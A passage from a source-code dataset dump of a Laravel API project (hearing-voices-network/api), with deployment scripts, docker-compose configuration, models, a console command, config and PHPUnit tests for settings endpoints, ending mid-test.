"license_type": "permissive",
"max_line_length": 52,
"num_lines": 25,
"path": "/docker/deploy.sh",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Requires the following environment variables:\n# $REPO_URI = The URI of the Docker repo to push to.\n# $CLUSTER = The name of the ECS cluster.\n# $SERVICE = The name of the ECS service.\n\n# Bail out on first error.\nset -e\n\n# Login to the ECR.\necho \"Logging in to ECR...\"\n$(aws ecr get-login --no-include-email)\n\n# Push the Docker image to ECR.\necho \"Pushing images to ECR...\"\ndocker push ${REPO_URI}:latest\n# docker push ${REPO_URI}:${TRAVIS_COMMIT}\n\n# Update the service.\necho \"Updating the ECS service...\"\naws ecs update-service \\\n --cluster ${CLUSTER} \\\n --service ${SERVICE} \\\n --force-new-deployment\n"
},
{
"alpha_fraction": 0.6434205174446106,
"alphanum_fraction": 0.6446658372879028,
"avg_line_length": 28.740739822387695,
"blob_id": "d1ecee51ad4843528fb81f20aac35758071c6a56",
"content_id": "7a7c638e2490892160ce2836d807389963f7f9de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2409,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 81,
"path": "/app/Models/EndUser.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse App\\Mail\\TemplateMail;\nuse App\\VariableSubstitution\\Email\\EndUser\\EmailConfirmationSubstituter;\nuse App\\VariableSubstitution\\Email\\EndUser\\PasswordResetSubstituter;\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Foundation\\Bus\\DispatchesJobs;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\URL;\n\nclass EndUser extends Model\n{\n use Mutators\\EndUserMutators;\n use Relationships\\EndUserRelationships;\n use Scopes\\EndUserScopes;\n use DispatchesJobs;\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'gdpr_consented_at' => 'datetime',\n ];\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n\n /**\n * Send the password reset notification.\n *\n * @param string $token\n */\n public function sendPasswordResetNotification($token): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $passwordResetUrl = route('auth.end-user.password.reset', ['token' => $token]);\n\n $this->dispatchNow(new TemplateMail(\n $this->user->email,\n Arr::get($emailContent, 'end_user.password_reset.subject'),\n Arr::get($emailContent, 'end_user.password_reset.body'),\n new PasswordResetSubstituter($this, $passwordResetUrl)\n ));\n }\n\n /**\n * Send the email verification notification.\n */\n public function sendEmailVerificationNotification(): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $verifyEmailUrl = URL::temporarySignedRoute(\n 'auth.end-user.verification.verify',\n Date::now()->addMinutes(Config::get('auth.verification.expire', 60)),\n ['id' => $this->user->getKey()]\n );\n\n $this->dispatchNow(new TemplateMail(\n $this->user->email,\n Arr::get($emailContent, 'end_user.email_confirmation.subject'),\n Arr::get($emailContent, 'end_user.email_confirmation.body'),\n new EmailConfirmationSubstituter($this, $verifyEmailUrl)\n ));\n }\n}\n"
},
{
"alpha_fraction": 0.5893032550811768,
"alphanum_fraction": 0.6000981330871582,
"avg_line_length": 19.795917510986328,
"blob_id": "6a0eab28aa25ea9927d3df14c1032b3915436f93",
"content_id": "b685a3488a830d395303556013c1278dfa806806",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 2038,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 98,
"path": "/docker-compose.yml",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "version: \"3\"\n\nservices:\n api:\n image: hearing-voices-network/api/app\n build:\n context: ./docker/app\n dockerfile: Dockerfile\n environment:\n - APP_ENV=local\n volumes:\n - .:/var/www/html\n networks:\n - app-net\n ports:\n - \"${APP_PORT:-80}:80\"\n restart: on-failure\n\n queue-worker:\n image: hearing-voices-network/api/app\n volumes:\n - .:/var/www/html\n networks:\n - app-net\n command: php artisan queue:listen --tries=1\n restart: on-failure\n\n scheduler:\n image: hearing-voices-network/api/app\n volumes:\n - .:/var/www/html\n networks:\n - app-net\n command: php artisan cv:schedule:loop\n restart: on-failure\n\n node:\n image: hearing-voices-network/api/node\n build:\n context: ./docker/node\n dockerfile: Dockerfile\n volumes:\n - .:/var/www/html\n\n mysql:\n image: mysql:5.7\n environment:\n MYSQL_ROOT_PASSWORD: \"${DB_ROOT_PASS:-secret}\"\n MYSQL_DATABASE: \"${DB_NAME:-connecting_voices}\"\n MYSQL_USER: \"${DB_USER:-connecting_voices}\"\n MYSQL_PASSWORD: \"${DB_PASS:-secret}\"\n volumes:\n - mysql-data:/var/lib/mysql\n networks:\n - app-net\n ports:\n - \"${DB_PORT:-3306}:3306\"\n\n mysql-testing:\n image: mysql:5.7\n environment:\n MYSQL_ROOT_PASSWORD: \"${DB_ROOT_PASS:-secret}\"\n MYSQL_DATABASE: \"${DB_NAME:-connecting_voices}\"\n MYSQL_USER: \"${DB_USER:-connecting_voices}\"\n MYSQL_PASSWORD: \"${DB_PASS:-secret}\"\n networks:\n - app-net\n\n redis:\n image: redis:5.0-alpine\n volumes:\n - redis-data:/data\n networks:\n - app-net\n\n redis-testing:\n image: redis:5.0-alpine\n networks:\n - app-net\n\n troposphere:\n image: hearing-voices-network/api/troposphere\n build:\n context: ./docker/troposphere\n dockerfile: Dockerfile\n volumes:\n - ./aws:/tmp\n command: \"python ${CFN_TEMPLATE:-cloudformation}.py\"\n\nnetworks:\n app-net:\n driver: bridge\n\nvolumes:\n mysql-data:\n driver: local\n redis-data:\n driver: local\n"
},
{
"alpha_fraction": 0.6083915829658508,
"alphanum_fraction": 0.6123875975608826,
"avg_line_length": 29.33333396911621,
"blob_id": "2255ce2c9df514403ae13b16bc6ba981fefa4b80",
"content_id": "9e20d446ca0aab521399934ecac90d23bd1a2007",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1001,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 33,
"path": "/app/Docs/Responses/ResourceDeletedResponse.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Responses;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass ResourceDeletedResponse extends Response\n{\n /**\n * @param string|null $objectId\n * @param string|null $resource\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response\n */\n public static function create(string $objectId = null, string $resource = null): BaseObject\n {\n return parent::create($objectId)\n ->statusCode(200)\n ->description('OK')\n ->content(\n MediaType::json()->schema(\n Schema::object()->properties(\n Schema::string('message')\n ->example(\"The $resource has been deleted.\")\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5510968565940857,
"alphanum_fraction": 0.5527019500732422,
"avg_line_length": 24.95833396911621,
"blob_id": "965a757eac2343cfb7f05e2a185ecc2891dd7b1c",
"content_id": "d727dd51fcdbfbd4aeaa4482c050be0c5255619f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1869,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 72,
"path": "/app/Console/Commands/Cv/Make/ClientCommand.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Console\\Commands\\Cv\\Make;\n\nuse Illuminate\\Console\\Command;\nuse Illuminate\\Support\\Str;\nuse Laravel\\Passport\\ClientRepository;\nuse Laravel\\Passport\\Passport;\n\nclass ClientCommand extends Command\n{\n /**\n * The name and signature of the console command.\n *\n * @var string\n */\n protected $signature = \"cv:make:client\n {name : The OAuth client's name}\n {redirect-uri : The OAuth client's redirect URI}\n {--first-party : Specify a first party client}\";\n\n /**\n * The console command description.\n *\n * @var string\n */\n protected $description = 'Create a new OAuth client';\n\n /**\n * @var \\Laravel\\Passport\\ClientRepository\n */\n protected $clients;\n\n /**\n * AdminCommand constructor.\n *\n * @param \\Laravel\\Passport\\ClientRepository $clients\n */\n public function __construct(ClientRepository $clients)\n {\n parent::__construct();\n\n $this->clients = $clients;\n }\n\n /**\n * Execute the console command.\n *\n * @throws \\Throwable\n */\n public function handle(): void\n {\n $client = Passport::client()->forceFill([\n 'user_id' => null,\n 'name' => $this->argument('name'),\n 'secret' => Str::random(40),\n 'redirect' => $this->argument('redirect-uri'),\n 'personal_access_client' => false,\n 'password_client' => false,\n 'first_party_client' => $this->option('first-party'),\n 'revoked' => false,\n ]);\n\n $client->save();\n\n $this->info('New client created successfully.');\n $this->line('<comment>Client ID:</comment> ' . $client->id);\n $this->line('<comment>Client secret:</comment> ' . $client->secret);\n }\n}\n"
},
{
"alpha_fraction": 0.5123271346092224,
"alphanum_fraction": 0.5183403491973877,
"avg_line_length": 22.09722137451172,
"blob_id": "0539bac6d005db31dfefd25377708334d07a624a",
"content_id": "908a24a9a52a17c213384e248e6736990531cb08",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1663,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 72,
"path": "/tests/Unit/Support/EnumTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Support;\n\nuse App\\Support\\Enum;\nuse Tests\\TestCase;\n\nclass EnumTest extends TestCase\n{\n const TEST_ONE = 'one';\n const TEST_TWO = 'two';\n const DIFFERENT_THREE = 'three';\n\n /** @test */\n public function class_with_no_constants(): void\n {\n $noConstants = new class {};\n\n $enum = new Enum($noConstants);\n $constants = $enum->get('');\n\n $this->assertCount(0, $constants);\n }\n\n /** @test */\n public function fully_qualified_class_name_works(): void\n {\n $enum = new Enum(static::class);\n $constants = $enum->get('TEST');\n\n $this->assertCount(2, $constants);\n $this->assertEquals([\n 'TEST_ONE' => 'one',\n 'TEST_TWO' => 'two',\n ], $constants);\n }\n\n /** @test */\n public function instance_works(): void\n {\n $enum = new Enum($this);\n $constants = $enum->get('TEST');\n\n $this->assertCount(2, $constants);\n $this->assertEquals([\n 'TEST_ONE' => 'one',\n 'TEST_TWO' => 'two',\n ], $constants);\n }\n\n /** @test */\n public function get_values_works(): void\n {\n $enum = new Enum($this);\n $constants = $enum->getValues('TEST');\n\n $this->assertCount(2, $constants);\n $this->assertEquals([0 => 'one', 1 => 'two'], $constants);\n }\n\n /** @test */\n public function get_keys_works(): void\n {\n $enum = new Enum($this);\n $constants = $enum->getkeys('TEST');\n\n $this->assertCount(2, $constants);\n $this->assertEquals([0 => 'TEST_ONE', 1 => 'TEST_TWO'], $constants);\n }\n}\n"
},
{
"alpha_fraction": 0.65976482629776,
"alphanum_fraction": 0.6799591183662415,
"avg_line_length": 33.619468688964844,
"blob_id": "2a0a9c9de317a241de74cf45b64f60f55db2062c",
"content_id": "8108c7aa760dd3b66027756e0828de7143d4081e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3912,
"license_type": "permissive",
"max_line_length": 875,
"num_lines": 113,
"path": "/tests/TestCase.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests;\n\nuse App\\Models\\File;\nuse App\\Support\\Filesystem;\nuse Illuminate\\Foundation\\Testing\\RefreshDatabase;\nuse Illuminate\\Foundation\\Testing\\TestCase as BaseTestCase;\nuse Illuminate\\Foundation\\Testing\\WithFaker;\nuse Illuminate\\Support\\Facades\\DB;\nuse Tests\\Support\\TestResponse;\n\n/**\n * @method TestResponse postJson(string $uri, array $data = [], array $headers = [])\n * @method TestResponse putJson(string $uri, array $data = [], array $headers = [])\n * @method TestResponse patchJson(string $uri, array $data = [], array $headers = [])\n * @method TestResponse json(string $method, string $uri, array $data = [], array $headers = [])\n */\nabstract class TestCase extends BaseTestCase\n{\n use CreatesApplication;\n use RefreshDatabase;\n use WithFaker;\n\n /**\n * Clean up the testing environment before the next test.\n *\n * @return void\n */\n protected function tearDown(): void\n {\n (new Filesystem())->clearDir(storage_path('testing'), ['.gitignore']);\n\n parent::tearDown();\n }\n\n /**\n * Overridden from parent to provide custom TestResponse class.\n *\n * @param \\Illuminate\\Http\\Response $response\n * @return \\Tests\\Support\\TestResponse\n */\n protected function createTestResponse($response): TestResponse\n {\n return TestResponse::fromBaseResponse($response);\n }\n\n /**\n * Visit the given URI with a GET request, expecting a JSON response.\n *\n * @param string $uri\n * @param array $data\n * @param array $headers\n * @return \\Tests\\Support\\TestResponse\n */\n public function getJson($uri, array $data = [], array $headers = []): TestResponse\n {\n $query = http_build_query($data);\n\n return parent::getJson(\"{$uri}?{$query}\", [], $headers);\n }\n\n /**\n * Visit the given URI with a DELETE request, expecting a JSON response.\n *\n * @param string $uri\n * @param array $data\n * @param array $headers\n * @return \\Tests\\Support\\TestResponse\n */\n public function deleteJson($uri, array $data = [], array $headers = []): TestResponse\n {\n $query = http_build_query($data);\n\n return parent::deleteJson(\"{$uri}?{$query}\", [], $headers);\n }\n\n /**\n * @param bool $isPrivate\n * @return \\App\\Models\\File\n */\n protected function createPngFile(bool $isPrivate = false): File\n {\n /** @var \\App\\Models\\File $file */\n $file = File::create([\n 'filename' => 'test.png',\n 'mime_type' => 'image/png',\n 'is_private' => $isPrivate,\n ]);\n\n return $file->uploadBase64EncodedFile(\n <<<EOT\n data:image/png;base64,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\n EOT\n );\n }\n\n /**\n * @param string ...$tables\n */\n protected function truncateTables(string ...$tables): void\n {\n DB::statement('SET FOREIGN_KEY_CHECKS=0');\n\n foreach ($tables as $table) {\n DB::table($table)->truncate();\n }\n\n DB::statement('SET FOREIGN_KEY_CHECKS=1');\n }\n}\n"
},
{
"alpha_fraction": 0.4583987295627594,
"alphanum_fraction": 0.4819466173648834,
"avg_line_length": 16.69444465637207,
"blob_id": "ac89927b3a3c7bbec865078943cbb3ff48a48b6f",
"content_id": "0da5159fade2c4a2c1a7fdf3cf55ed1c7e34127b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 637,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 36,
"path": "/config/connecting_voices.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nreturn [\n\n 'repo_url' => 'https://github.com/hearing-voices-network/api',\n\n 'frontend_url' => env('FRONTEND_URL'),\n\n 'admin_url' => env('ADMIN_URL'),\n\n 'age_requirement' => [\n 'min' => 13,\n 'max' => 100,\n ],\n\n 'pagination' => [\n 'default' => 10,\n 'max' => 100,\n ],\n\n 'file_tokens' => [\n // 5 minutes.\n 'expiry_time' => 60 * 5,\n ],\n\n 'admin_email' => '[email protected]', // TODO: Change this once confirmed by client.\n\n 'date_format' => 'd/m/Y',\n\n 'datetime_format' => 'd/m/Y H:i:s',\n\n 'otp_enabled' => env('OTP_ENABLED', true),\n\n];\n"
},
{
"alpha_fraction": 0.393781840801239,
"alphanum_fraction": 0.3951070308685303,
"avg_line_length": 37.69822311401367,
"blob_id": "c8e3f5fc2151975bda1b3c0dd3e9a3dcb2d81c01",
"content_id": "24450f2d1dbaf7a7a109d5e529eed13e1dce0536",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 19620,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 507,
"path": "/tests/Feature/V1/SettingControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\Setting;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass SettingControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_can_index(): void\n {\n $response = $this->getJson('/v1/settings');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function end_user_can_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/settings');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/settings');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/settings');\n\n $response->assertJsonStructure([\n 'data' => [\n 'frontend_content' => [\n 'home_page' => [\n 'title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject',\n 'body',\n ],\n 'updated_contribution' => [\n 'subject',\n 'body',\n ],\n 'new_end_user' => [\n 'subject',\n 'body',\n ],\n 'password_reset' => [\n 'subject',\n 'body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject',\n 'body',\n ],\n 'password_reset' => [\n 'subject',\n 'body',\n ],\n 'contribution_approved' => [\n 'subject',\n 'body',\n ],\n 'contribution_rejected' => [\n 'subject',\n 'body',\n ],\n ],\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $frontendContent = Setting::findOrFail('frontend_content')->value;\n $emailContent = Setting::findOrFail('email_content')->value;\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/settings');\n\n $response->assertJsonFragment([\n [\n 'frontend_content' => [\n 'home_page' => [\n 'title' => $frontendContent['home_page']['title'],\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => $emailContent['admin']['new_contribution']['subject'],\n 'body' => $emailContent['admin']['new_contribution']['body'],\n ],\n 'updated_contribution' => [\n 'subject' => $emailContent['admin']['updated_contribution']['subject'],\n 'body' => $emailContent['admin']['updated_contribution']['body'],\n ],\n 'new_end_user' => [\n 'subject' => $emailContent['admin']['new_end_user']['subject'],\n 'body' => $emailContent['admin']['new_end_user']['body'],\n ],\n 'password_reset' => [\n 'subject' => $emailContent['admin']['password_reset']['subject'],\n 'body' => $emailContent['admin']['password_reset']['body'],\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => $emailContent['end_user']['email_confirmation']['subject'],\n 'body' => $emailContent['end_user']['email_confirmation']['body'],\n ],\n 'password_reset' => [\n 'subject' => $emailContent['end_user']['password_reset']['subject'],\n 'body' => $emailContent['end_user']['password_reset']['body'],\n ],\n 'contribution_approved' => [\n 'subject' => $emailContent['end_user']['contribution_approved']['subject'],\n 'body' => $emailContent['end_user']['contribution_approved']['body'],\n ],\n 'contribution_rejected' => [\n 'subject' => $emailContent['end_user']['contribution_rejected']['subject'],\n 'body' => $emailContent['end_user']['contribution_rejected']['body'],\n ],\n ],\n ],\n ],\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/settings');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === 'Viewed settings.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Update.\n */\n\n /** @test */\n public function guest_cannot_update(): void\n {\n $response = $this->putJson('/v1/settings');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_update(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->putJson('/v1/settings');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_update(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson('/v1/settings', [\n 'frontend_content' => [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ],\n ]);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_update(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson('/v1/settings', [\n 'frontend_content' => [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ],\n ]);\n\n $response->assertJsonStructure([\n 'data' => [\n 'frontend_content' => [\n 'home_page' => [\n 'title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject',\n 'body',\n ],\n 'updated_contribution' => [\n 'subject',\n 'body',\n ],\n 'new_end_user' => [\n 'subject',\n 'body',\n ],\n 'password_reset' => [\n 'subject',\n 'body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject',\n 'body',\n ],\n 'password_reset' => [\n 'subject',\n 'body',\n ],\n 'contribution_approved' => [\n 'subject',\n 'body',\n ],\n 'contribution_rejected' => [\n 'subject',\n 'body',\n ],\n ],\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_update(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson('/v1/settings', [\n 'frontend_content' => [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n 